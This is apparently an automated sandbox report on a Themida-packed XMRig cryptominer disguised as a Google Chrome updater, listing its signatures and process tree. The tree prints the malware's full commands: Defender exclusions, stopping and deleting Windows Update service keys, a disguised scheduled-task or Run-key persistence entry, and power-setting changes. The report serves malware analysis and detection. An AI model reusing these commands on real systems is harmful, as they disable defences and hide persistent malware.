Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
296s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
03/12/2022, 23:32
Behavioral task
behavioral1
Sample
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Resource
win7-20220901-en
General
-
Target
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
-
Size
6.7MB
-
MD5
57bc38aa4830968ccfd83ddf9417c93f
-
SHA1
31b3dc9a13f1a9fffc2eeb272494bf60fc385338
-
SHA256
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
-
SHA512
26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
-
SSDEEP
196608:2rL58hRFrt1wspQDI9mW4VQ7JEuyHzqFMZMCO:6E3J6spIMmW73JMZMCO
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 3844 created 2836 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 53 PID 3844 created 2836 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 53 PID 3844 created 2836 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 53 PID 3844 created 2836 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 53 PID 3844 created 2836 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 PID 4860 created 2836 4860 updater.exe 53 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/memory/344-672-0x00007FF62BC50000-0x00007FF62C444000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
pid Process 4860 updater.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral2/memory/344-672-0x00007FF62BC50000-0x00007FF62C444000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
resource yara_rule behavioral2/memory/3844-115-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-116-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-117-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-118-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-119-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-121-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/memory/3844-212-0x00007FF77BE60000-0x00007FF77CA9D000-memory.dmp themida behavioral2/files/0x0004000000015232-228.dat themida behavioral2/memory/4860-230-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida behavioral2/memory/4860-231-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida behavioral2/memory/4860-232-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida behavioral2/memory/4860-233-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida behavioral2/memory/4860-235-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida behavioral2/files/0x0004000000015232-666.dat themida behavioral2/memory/4860-670-0x00007FF6225F0000-0x00007FF62322D000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 4860 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4860 set thread context of 4132 4860 updater.exe 116 PID 4860 set thread context of 344 4860 updater.exe 122 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4324 sc.exe 3424 sc.exe 2252 sc.exe 2720 sc.exe 1140 sc.exe 3564 sc.exe 2644 sc.exe 4660 sc.exe 4092 sc.exe 4376 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3540 powershell.exe 3540 powershell.exe 3540 powershell.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 3844 f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe 4484 powershell.exe 4484 powershell.exe 4484 powershell.exe 4860 updater.exe 4860 updater.exe 4888 powershell.exe 4888 powershell.exe 4888 powershell.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 1008 powershell.exe 1008 powershell.exe 1008 powershell.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 4860 updater.exe 4132 conhost.exe 4132 conhost.exe 4860 updater.exe 4860 updater.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe 344 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 600 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4512 powershell.exe Token: SeIncreaseQuotaPrivilege 4512 powershell.exe Token: SeSecurityPrivilege 4512 powershell.exe Token: SeTakeOwnershipPrivilege 4512 powershell.exe Token: SeLoadDriverPrivilege 4512 powershell.exe Token: SeSystemProfilePrivilege 4512 powershell.exe Token: SeSystemtimePrivilege 4512 powershell.exe Token: SeProfSingleProcessPrivilege 4512 powershell.exe Token: SeIncBasePriorityPrivilege 4512 powershell.exe Token: SeCreatePagefilePrivilege 4512 powershell.exe Token: SeBackupPrivilege 4512 powershell.exe Token: SeRestorePrivilege 4512 powershell.exe Token: SeShutdownPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeSystemEnvironmentPrivilege 4512 powershell.exe Token: SeRemoteShutdownPrivilege 4512 powershell.exe Token: SeUndockPrivilege 4512 powershell.exe Token: SeManageVolumePrivilege 4512 powershell.exe Token: 33 4512 powershell.exe Token: 34 4512 powershell.exe Token: 35 4512 powershell.exe Token: 36 4512 powershell.exe Token: SeShutdownPrivilege 4036 powercfg.exe Token: SeCreatePagefilePrivilege 4036 powercfg.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeShutdownPrivilege 4392 powercfg.exe Token: SeCreatePagefilePrivilege 4392 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 5028 powercfg.exe Token: SeCreatePagefilePrivilege 5028 powercfg.exe Token: SeIncreaseQuotaPrivilege 3540 powershell.exe Token: SeSecurityPrivilege 3540 powershell.exe Token: SeTakeOwnershipPrivilege 3540 powershell.exe Token: SeLoadDriverPrivilege 3540 powershell.exe Token: SeSystemProfilePrivilege 3540 powershell.exe Token: SeSystemtimePrivilege 3540 powershell.exe Token: SeProfSingleProcessPrivilege 3540 powershell.exe Token: SeIncBasePriorityPrivilege 3540 powershell.exe Token: SeCreatePagefilePrivilege 3540 powershell.exe Token: SeBackupPrivilege 3540 powershell.exe Token: SeRestorePrivilege 3540 powershell.exe Token: SeShutdownPrivilege 3540 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeSystemEnvironmentPrivilege 3540 powershell.exe Token: SeRemoteShutdownPrivilege 3540 powershell.exe Token: SeUndockPrivilege 3540 powershell.exe Token: SeManageVolumePrivilege 3540 powershell.exe Token: 33 3540 powershell.exe Token: 34 3540 powershell.exe Token: 35 3540 powershell.exe Token: 36 3540 powershell.exe Token: SeIncreaseQuotaPrivilege 3540 powershell.exe Token: SeSecurityPrivilege 3540 powershell.exe Token: SeTakeOwnershipPrivilege 3540 powershell.exe Token: SeLoadDriverPrivilege 3540 powershell.exe Token: SeSystemProfilePrivilege 3540 powershell.exe Token: SeSystemtimePrivilege 3540 powershell.exe Token: SeProfSingleProcessPrivilege 3540 powershell.exe Token: SeIncBasePriorityPrivilege 3540 powershell.exe Token: SeCreatePagefilePrivilege 3540 powershell.exe Token: SeBackupPrivilege 3540 powershell.exe Token: SeRestorePrivilege 3540 powershell.exe Token: SeShutdownPrivilege 3540 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 3584 wrote to memory of 1140 3584 cmd.exe 75 PID 3584 wrote to memory of 1140 3584 cmd.exe 75 PID 3584 wrote to memory of 4324 3584 cmd.exe 76 PID 3584 wrote to memory of 4324 3584 cmd.exe 76 PID 1084 wrote to memory of 4036 1084 cmd.exe 77 PID 1084 wrote to memory of 4036 1084 cmd.exe 77 PID 3584 wrote to memory of 4376 3584 cmd.exe 78 PID 3584 wrote to memory of 4376 3584 cmd.exe 78 PID 1084 wrote to memory of 4392 1084 cmd.exe 79 PID 1084 wrote to memory of 4392 1084 cmd.exe 79 PID 3584 wrote to memory of 3564 3584 cmd.exe 80 PID 3584 wrote to memory of 3564 3584 cmd.exe 80 PID 1084 wrote to memory of 4976 1084 cmd.exe 81 PID 1084 wrote to memory of 4976 1084 cmd.exe 81 PID 3584 wrote to memory of 2644 3584 cmd.exe 82 PID 3584 wrote to memory of 2644 3584 cmd.exe 82 PID 1084 wrote to memory of 5028 1084 cmd.exe 83 PID 1084 wrote to memory of 5028 1084 cmd.exe 83 PID 3584 wrote to memory of 4688 3584 cmd.exe 84 PID 3584 wrote to memory of 4688 3584 cmd.exe 84 PID 3584 wrote to memory of 4016 3584 cmd.exe 85 PID 3584 wrote to memory of 4016 3584 cmd.exe 85 PID 3584 wrote to memory of 2976 3584 cmd.exe 86 PID 3584 wrote to memory of 2976 3584 cmd.exe 86 PID 3584 wrote to memory of 4788 3584 cmd.exe 87 PID 3584 wrote to memory of 4788 3584 cmd.exe 87 PID 3584 wrote to memory of 4716 3584 cmd.exe 88 PID 3584 wrote to memory of 4716 3584 cmd.exe 88 PID 4484 wrote to memory of 4968 4484 powershell.exe 92 PID 4484 wrote to memory of 4968 4484 powershell.exe 92 PID 4028 wrote to memory of 4660 4028 cmd.exe 102 PID 4028 wrote to memory of 4660 4028 cmd.exe 102 PID 4028 wrote to memory of 3424 4028 cmd.exe 103 PID 4028 wrote to memory of 3424 4028 cmd.exe 103 PID 4028 wrote to memory of 2252 4028 cmd.exe 104 PID 4028 wrote to memory of 2252 4028 cmd.exe 104 PID 4784 wrote to memory of 2136 4784 cmd.exe 105 PID 4784 wrote to memory of 2136 4784 cmd.exe 105 PID 4028 wrote to memory of 2720 4028 cmd.exe 106 PID 4028 wrote to memory of 2720 4028 cmd.exe 106 PID 4784 wrote to memory of 4668 4784 cmd.exe 107 PID 4784 wrote to memory of 4668 4784 cmd.exe 107 PID 4028 wrote to memory of 4092 4028 cmd.exe 108 PID 4028 wrote to memory of 4092 4028 cmd.exe 108 PID 4784 wrote to memory of 4036 4784 cmd.exe 109 PID 4784 wrote to memory of 4036 4784 cmd.exe 109 PID 4784 wrote to memory of 4384 4784 cmd.exe 110 PID 4784 wrote to memory of 4384 4784 cmd.exe 110 PID 4028 wrote to memory of 4828 4028 cmd.exe 111 PID 4028 wrote to memory of 4828 4028 cmd.exe 111 PID 4028 wrote to memory of 696 4028 cmd.exe 112 PID 4028 wrote to memory of 696 4028 cmd.exe 112 PID 4028 wrote to memory of 2644 4028 cmd.exe 113 PID 4028 wrote to memory of 2644 4028 cmd.exe 113 PID 4028 wrote to memory of 4388 4028 cmd.exe 114 PID 4028 wrote to memory of 4388 4028 cmd.exe 114 PID 4028 wrote to memory of 3448 4028 cmd.exe 115 PID 4028 wrote to memory of 3448 4028 cmd.exe 115 PID 4860 wrote to memory of 4132 4860 updater.exe 116 PID 2952 wrote to memory of 3840 2952 cmd.exe 121 PID 2952 wrote to memory of 3840 2952 cmd.exe 121 PID 4860 wrote to memory of 344 4860 updater.exe 122
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1140
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4324
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4376
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3564
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2644
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4688
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4016
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2976
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4788
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zneglfoyv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:4968
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4888
-
-
